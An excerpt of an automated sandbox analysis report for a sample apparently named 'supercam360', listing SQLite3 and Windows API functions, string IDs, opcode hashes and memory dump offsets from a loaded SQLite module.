                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                    • String ID:
                                                    • API String ID: 3265351223-3916222277
                                                    • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                    • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                    • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                    • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmp
                                                    • String ID: log
                                                    • API String ID: 912767213-2403297477
                                                    • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                    • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                    • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                    • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_strnicmp
                                                    • String ID: SQLITE_
                                                    • API String ID: 1961171630-787686576
                                                    • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                    • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                    • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                    • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                    APIs
                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                    • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                    Strings
                                                    • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                    • String ID: Invalid argument to rtreedepth()
                                                    • API String ID: 1063208240-2843521569
                                                    • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                    • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                    • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                    • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                    APIs
                                                    • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                      • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                      • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                      • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                      • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                    • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: soft_heap_limit
                                                    • API String ID: 1251656441-405162809
                                                    • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                    • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                    • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                    • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                    APIs
                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: NULL
                                                    • API String ID: 632333372-324932091
                                                    • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                    • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                    • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                    • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeavefree
                                                    • String ID:
                                                    • API String ID: 4020351045-0
                                                    • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                    • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                    • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                    • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                    • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                    • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                    • String ID:
                                                    • API String ID: 682475483-0
                                                    • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                    • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                    • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                    • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2